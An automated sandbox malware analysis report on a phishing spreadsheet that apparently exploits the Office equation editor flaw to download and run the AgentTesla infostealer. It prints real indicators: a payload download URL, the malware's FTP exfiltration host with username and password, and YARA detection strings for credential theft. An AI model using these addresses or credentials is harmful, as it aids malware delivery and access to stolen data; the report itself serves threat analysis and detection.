Edit tour

Windows Analysis Report
Quotation - Optical Eyeglasses.xlsx

Overview

General Information

Sample Name:	Quotation - Optical Eyeglasses.xlsx
Analysis ID:	680486
MD5:	936a314411e4a93f2dd6a01b51216ef3
SHA1:	47483467b595bdd9a49b577f457d84bcdb3b1c3b
SHA256:	0897c1227e00e63196869de72f0e4436e8493a7ee095be94a914d4e547d6ac2e
Tags:	xlsx
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected AgentTesla

Yara detected AntiVM3

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Tries to steal Mail credentials (via file / registry access)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Injects a PE file into a foreign processes

Shellcode detected

Office equation editor drops PE file

.NET source code contains very large array initializations

Machine Learning detection for dropped file

Office equation editor establishes network connection

Drops PE files to the user root directory

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Yara detected Credential Stealer

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Contains functionality to download and execute PE files

Office Equation Editor has been started

Contains functionality to download and launch executables

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Drops PE files to the user directory

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2648 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 1160 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

Regasm_svchost.exe (PID: 2884 cmdline: "C:\Users\Public\Regasm_svchost.exe" MD5: A6439DBBF3F848EB6F83494C5C75A7A6)

Regasm_svchost.exe (PID: 616 cmdline: C:\Users\Public\Regasm_svchost.exe MD5: A6439DBBF3F848EB6F83494C5C75A7A6)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "FTP Host": "ftp://ftp.alonsorojasmudanzasnacionales.com/", "Username": "okok@alonsorojasmudanzasnacionales.com", "Password": "(gt)~^6!Sq6-"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.1174667673.0000000002588000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.989370105.000000000278B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000005.00000002.989818369.0000000003628000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.989818369.0000000003628000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000005.00000002.989818369.0000000003628000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x66ff3:$a13: get_DnsResolver 0x9b613:$a13: get_DnsResolver 0xcfa33:$a13: get_DnsResolver 0x65809:$a20: get_LastAccessed 0x99e29:$a20: get_LastAccessed 0xce249:$a20: get_LastAccessed 0x67971:$a27: set_InternalServerPort 0x9bf91:$a27: set_InternalServerPort 0xd03b1:$a27: set_InternalServerPort 0x67c8d:$a30: set_GuidMasterKey 0x9c2ad:$a30: set_GuidMasterKey 0xd06cd:$a30: set_GuidMasterKey 0x65910:$a33: get_Clipboard 0x99f30:$a33: get_Clipboard 0xce350:$a33: get_Clipboard 0x6591e:$a34: get_Keyboard 0x99f3e:$a34: get_Keyboard 0xce35e:$a34: get_Keyboard 0x66c26:$a35: get_ShiftKeyDown 0x9b246:$a35: get_ShiftKeyDown 0xcf666:$a35: get_ShiftKeyDown
00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000000.986284628.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000006.00000000.986284628.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000006.00000000.986284628.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x300a3:$a13: get_DnsResolver 0x2e8b9:$a20: get_LastAccessed 0x30a21:$a27: set_InternalServerPort 0x30d3d:$a30: set_GuidMasterKey 0x2e9c0:$a33: get_Clipboard 0x2e9ce:$a34: get_Keyboard 0x2fcd6:$a35: get_ShiftKeyDown 0x2fce7:$a36: get_AltKeyDown 0x2e9db:$a37: get_Password 0x2f486:$a38: get_PasswordHash 0x304a3:$a39: get_DefaultCredentials
00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Regasm_svchost.exe PID: 2884	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Regasm_svchost.exe PID: 2884	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Regasm_svchost.exe PID: 2884	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0xc66e:$a13: get_DnsResolver 0xb0e4:$a20: get_LastAccessed 0xcf9b:$a27: set_InternalServerPort 0xd1f7:$a30: set_GuidMasterKey 0xb1d7:$a33: get_Clipboard 0xb1e5:$a34: get_Keyboard 0xc340:$a35: get_ShiftKeyDown 0xc351:$a36: get_AltKeyDown 0xb1f2:$a37: get_Password 0xbbf9:$a38: get_PasswordHash 0xca42:$a39: get_DefaultCredentials
Process Memory Space: Regasm_svchost.exe PID: 616	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Regasm_svchost.exe PID: 616	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Regasm_svchost.exe PID: 616	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x4f8ba:$a13: get_DnsResolver 0x4e330:$a20: get_LastAccessed 0x501e7:$a27: set_InternalServerPort 0x50443:$a30: set_GuidMasterKey 0x4e423:$a33: get_Clipboard 0x4e431:$a34: get_Keyboard 0x4f58c:$a35: get_ShiftKeyDown 0x4f59d:$a36: get_AltKeyDown 0x4e43e:$a37: get_Password 0x4ee45:$a38: get_PasswordHash 0x4fc8e:$a39: get_DefaultCredentials
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.0.Regasm_svchost.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
6.0.Regasm_svchost.exe.400000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
6.0.Regasm_svchost.exe.400000.0.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32b57:$s10: logins 0x325be:$s11: credential 0x2ebc0:$g1: get_Clipboard 0x2ebce:$g2: get_Keyboard 0x2ebdb:$g3: get_Password 0x2fec6:$g4: get_CtrlKeyDown 0x2fed6:$g5: get_ShiftKeyDown 0x2fee7:$g6: get_AltKeyDown
6.0.Regasm_svchost.exe.400000.0.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x302a3:$a13: get_DnsResolver 0x2eab9:$a20: get_LastAccessed 0x30c21:$a27: set_InternalServerPort 0x30f3d:$a30: set_GuidMasterKey 0x2ebc0:$a33: get_Clipboard 0x2ebce:$a34: get_Keyboard 0x2fed6:$a35: get_ShiftKeyDown 0x2fee7:$a36: get_AltKeyDown 0x2ebdb:$a37: get_Password 0x2f686:$a38: get_PasswordHash 0x306a3:$a39: get_DefaultCredentials
5.2.Regasm_svchost.exe.365ed50.11.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.Regasm_svchost.exe.365ed50.11.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
5.2.Regasm_svchost.exe.365ed50.11.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x30d57:$s10: logins 0x307be:$s11: credential 0x2cdc0:$g1: get_Clipboard 0x2cdce:$g2: get_Keyboard 0x2cddb:$g3: get_Password 0x2e0c6:$g4: get_CtrlKeyDown 0x2e0d6:$g5: get_ShiftKeyDown 0x2e0e7:$g6: get_AltKeyDown
5.2.Regasm_svchost.exe.365ed50.11.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x2e4a3:$a13: get_DnsResolver 0x2ccb9:$a20: get_LastAccessed 0x2ee21:$a27: set_InternalServerPort 0x2f13d:$a30: set_GuidMasterKey 0x2cdc0:$a33: get_Clipboard 0x2cdce:$a34: get_Keyboard 0x2e0d6:$a35: get_ShiftKeyDown 0x2e0e7:$a36: get_AltKeyDown 0x2cddb:$a37: get_Password 0x2d886:$a38: get_PasswordHash 0x2e8a3:$a39: get_DefaultCredentials
5.2.Regasm_svchost.exe.3693370.9.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.Regasm_svchost.exe.3693370.9.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
5.2.Regasm_svchost.exe.3693370.9.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x30d57:$s10: logins 0x307be:$s11: credential 0x2cdc0:$g1: get_Clipboard 0x2cdce:$g2: get_Keyboard 0x2cddb:$g3: get_Password 0x2e0c6:$g4: get_CtrlKeyDown 0x2e0d6:$g5: get_ShiftKeyDown 0x2e0e7:$g6: get_AltKeyDown
5.2.Regasm_svchost.exe.3693370.9.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x2e4a3:$a13: get_DnsResolver 0x2ccb9:$a20: get_LastAccessed 0x2ee21:$a27: set_InternalServerPort 0x2f13d:$a30: set_GuidMasterKey 0x2cdc0:$a33: get_Clipboard 0x2cdce:$a34: get_Keyboard 0x2e0d6:$a35: get_ShiftKeyDown 0x2e0e7:$a36: get_AltKeyDown 0x2cddb:$a37: get_Password 0x2d886:$a38: get_PasswordHash 0x2e8a3:$a39: get_DefaultCredentials
5.2.Regasm_svchost.exe.3693370.9.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.Regasm_svchost.exe.3693370.9.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
5.2.Regasm_svchost.exe.3693370.9.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32b57:$s10: logins 0x66f77:$s10: logins 0x325be:$s11: credential 0x669de:$s11: credential 0x2ebc0:$g1: get_Clipboard 0x62fe0:$g1: get_Clipboard 0x2ebce:$g2: get_Keyboard 0x62fee:$g2: get_Keyboard 0x2ebdb:$g3: get_Password 0x62ffb:$g3: get_Password 0x2fec6:$g4: get_CtrlKeyDown 0x642e6:$g4: get_CtrlKeyDown 0x2fed6:$g5: get_ShiftKeyDown 0x642f6:$g5: get_ShiftKeyDown 0x2fee7:$g6: get_AltKeyDown 0x64307:$g6: get_AltKeyDown
5.2.Regasm_svchost.exe.3693370.9.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x9c46b:$s1: file:/// 0x11048b:$s1: file:/// 0x9c37b:$s2: {11111-22222-10009-11112} 0x11039b:$s2: {11111-22222-10009-11112} 0x9c3fb:$s3: {11111-22222-50001-00000} 0x11041b:$s3: {11111-22222-50001-00000} 0x996ff:$s4: get_Module 0x10d71f:$s4: get_Module 0x2f129:$s5: Reverse 0x63549:$s5: Reverse 0x99b78:$s5: Reverse 0x10db98:$s5: Reverse 0x30fdf:$s6: BlockCopy 0x653ff:$s6: BlockCopy 0x9bb3d:$s6: BlockCopy 0x10fb5d:$s6: BlockCopy 0x2f3ca:$s7: ReadByte 0x637ea:$s7: ReadByte 0x9c47d:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ... 0x11049d:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
5.2.Regasm_svchost.exe.3693370.9.raw.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x302a3:$a13: get_DnsResolver 0x646c3:$a13: get_DnsResolver 0x2eab9:$a20: get_LastAccessed 0x62ed9:$a20: get_LastAccessed 0x30c21:$a27: set_InternalServerPort 0x65041:$a27: set_InternalServerPort 0x30f3d:$a30: set_GuidMasterKey 0x6535d:$a30: set_GuidMasterKey 0x2ebc0:$a33: get_Clipboard 0x62fe0:$a33: get_Clipboard 0x2ebce:$a34: get_Keyboard 0x62fee:$a34: get_Keyboard 0x2fed6:$a35: get_ShiftKeyDown 0x642f6:$a35: get_ShiftKeyDown 0x2fee7:$a36: get_AltKeyDown 0x64307:$a36: get_AltKeyDown 0x2ebdb:$a37: get_Password 0x62ffb:$a37: get_Password 0x2f686:$a38: get_PasswordHash 0x63aa6:$a38: get_PasswordHash 0x306a3:$a39: get_DefaultCredentials
5.2.Regasm_svchost.exe.365ed50.11.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.Regasm_svchost.exe.365ed50.11.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
5.2.Regasm_svchost.exe.365ed50.11.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32b57:$s10: logins 0x67177:$s10: logins 0x9b597:$s10: logins 0x325be:$s11: credential 0x66bde:$s11: credential 0x9affe:$s11: credential 0x2ebc0:$g1: get_Clipboard 0x631e0:$g1: get_Clipboard 0x97600:$g1: get_Clipboard 0x2ebce:$g2: get_Keyboard 0x631ee:$g2: get_Keyboard 0x9760e:$g2: get_Keyboard 0x2ebdb:$g3: get_Password 0x631fb:$g3: get_Password 0x9761b:$g3: get_Password 0x2fec6:$g4: get_CtrlKeyDown 0x644e6:$g4: get_CtrlKeyDown 0x98906:$g4: get_CtrlKeyDown 0x2fed6:$g5: get_ShiftKeyDown 0x644f6:$g5: get_ShiftKeyDown 0x98916:$g5: get_ShiftKeyDown
5.2.Regasm_svchost.exe.365ed50.11.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xd0a8b:$s1: file:/// 0x144aab:$s1: file:/// 0xd099b:$s2: {11111-22222-10009-11112} 0x1449bb:$s2: {11111-22222-10009-11112} 0xd0a1b:$s3: {11111-22222-50001-00000} 0x144a3b:$s3: {11111-22222-50001-00000} 0xcdd1f:$s4: get_Module 0x141d3f:$s4: get_Module 0x2f129:$s5: Reverse 0x63749:$s5: Reverse 0x97b69:$s5: Reverse 0xce198:$s5: Reverse 0x1421b8:$s5: Reverse 0x30fdf:$s6: BlockCopy 0x655ff:$s6: BlockCopy 0x99a1f:$s6: BlockCopy 0xd015d:$s6: BlockCopy 0x14417d:$s6: BlockCopy 0x2f3ca:$s7: ReadByte 0x639ea:$s7: ReadByte 0x97e0a:$s7: ReadByte
5.2.Regasm_svchost.exe.365ed50.11.raw.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x302a3:$a13: get_DnsResolver 0x648c3:$a13: get_DnsResolver 0x98ce3:$a13: get_DnsResolver 0x2eab9:$a20: get_LastAccessed 0x630d9:$a20: get_LastAccessed 0x974f9:$a20: get_LastAccessed 0x30c21:$a27: set_InternalServerPort 0x65241:$a27: set_InternalServerPort 0x99661:$a27: set_InternalServerPort 0x30f3d:$a30: set_GuidMasterKey 0x6555d:$a30: set_GuidMasterKey 0x9997d:$a30: set_GuidMasterKey 0x2ebc0:$a33: get_Clipboard 0x631e0:$a33: get_Clipboard 0x97600:$a33: get_Clipboard 0x2ebce:$a34: get_Keyboard 0x631ee:$a34: get_Keyboard 0x9760e:$a34: get_Keyboard 0x2fed6:$a35: get_ShiftKeyDown 0x644f6:$a35: get_ShiftKeyDown 0x98916:$a35: get_ShiftKeyDown
5.2.Regasm_svchost.exe.3628930.10.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.Regasm_svchost.exe.3628930.10.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
5.2.Regasm_svchost.exe.3628930.10.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x68f77:$s10: logins 0x9d597:$s10: logins 0xd19b7:$s10: logins 0x689de:$s11: credential 0x9cffe:$s11: credential 0xd141e:$s11: credential 0x64fe0:$g1: get_Clipboard 0x99600:$g1: get_Clipboard 0xcda20:$g1: get_Clipboard 0x64fee:$g2: get_Keyboard 0x9960e:$g2: get_Keyboard 0xcda2e:$g2: get_Keyboard 0x64ffb:$g3: get_Password 0x9961b:$g3: get_Password 0xcda3b:$g3: get_Password 0x662e6:$g4: get_CtrlKeyDown 0x9a906:$g4: get_CtrlKeyDown 0xced26:$g4: get_CtrlKeyDown 0x662f6:$g5: get_ShiftKeyDown 0x9a916:$g5: get_ShiftKeyDown 0xced36:$g5: get_ShiftKeyDown
5.2.Regasm_svchost.exe.3628930.10.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x106eab:$s1: file:/// 0x17aecb:$s1: file:/// 0x106dbb:$s2: {11111-22222-10009-11112} 0x17addb:$s2: {11111-22222-10009-11112} 0x106e3b:$s3: {11111-22222-50001-00000} 0x17ae5b:$s3: {11111-22222-50001-00000} 0x10413f:$s4: get_Module 0x17815f:$s4: get_Module 0x65549:$s5: Reverse 0x99b69:$s5: Reverse 0xcdf89:$s5: Reverse 0x1045b8:$s5: Reverse 0x1785d8:$s5: Reverse 0x673ff:$s6: BlockCopy 0x9ba1f:$s6: BlockCopy 0xcfe3f:$s6: BlockCopy 0x10657d:$s6: BlockCopy 0x17a59d:$s6: BlockCopy 0x657ea:$s7: ReadByte 0x99e0a:$s7: ReadByte 0xce22a:$s7: ReadByte
5.2.Regasm_svchost.exe.3628930.10.raw.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x666c3:$a13: get_DnsResolver 0x9ace3:$a13: get_DnsResolver 0xcf103:$a13: get_DnsResolver 0x64ed9:$a20: get_LastAccessed 0x994f9:$a20: get_LastAccessed 0xcd919:$a20: get_LastAccessed 0x67041:$a27: set_InternalServerPort 0x9b661:$a27: set_InternalServerPort 0xcfa81:$a27: set_InternalServerPort 0x6735d:$a30: set_GuidMasterKey 0x9b97d:$a30: set_GuidMasterKey 0xcfd9d:$a30: set_GuidMasterKey 0x64fe0:$a33: get_Clipboard 0x99600:$a33: get_Clipboard 0xcda20:$a33: get_Clipboard 0x64fee:$a34: get_Keyboard 0x9960e:$a34: get_Keyboard 0xcda2e:$a34: get_Keyboard 0x662f6:$a35: get_ShiftKeyDown 0x9a916:$a35: get_ShiftKeyDown 0xced36:$a35: get_ShiftKeyDown
Click to see the 22 entries

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 198.12.89.152, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1160, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49179

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1160, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mon[1].exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Quotation - Optical Eyeglasses.xlsx	Virustotal: Detection: 35%			Perma Link
Source: Quotation - Optical Eyeglasses.xlsx	ReversingLabs: Detection: 31%

Antivirus detection for URL or domain

Source: http://198.12.89.152/mon/mon.exehhC:	Avira URL Cloud: Label: malware
Source: ftp://ftp.alonsorojasmudanzasnacionales.com/okok	Avira URL Cloud: Label: malware
Source: http://198.12.89.152/mon/mon.exe	Avira URL Cloud: Label: malware

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mon[1].exe	Joe Sandbox ML: detected
Source: C:\Users\Public\Regasm_svchost.exe	Joe Sandbox ML: detected

Source: 6.0.Regasm_svchost.exe.400000.0.unpack

Avira: Label: TR/Spy.Gen8

Source: 6.0.Regasm_svchost.exe.400000.0.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "FTP Host": "ftp://ftp.alonsorojasmudanzasnacionales.com/", "Username": "okok@alonsorojasmudanzasnacionales.com", "Password": "(gt)~^6!Sq6-"}

Exploits

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\Regasm_svchost.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\Regasm_svchost.exe			Jump to behavior

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 198.12.89.152 Port: 80

Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_033F05B6 ShellExecuteW,ExitProcess,	2_2_033F05B6
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_033F0517 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_033F0517
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_033F0588 URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_033F0588
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_033F0531 URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_033F0531
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_033F05A1 ShellExecuteW,ExitProcess,	2_2_033F05A1
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_033F045C ExitProcess,	2_2_033F045C
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_033F05DB ExitProcess,	2_2_033F05DB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_033F0491 URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_033F0491

Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
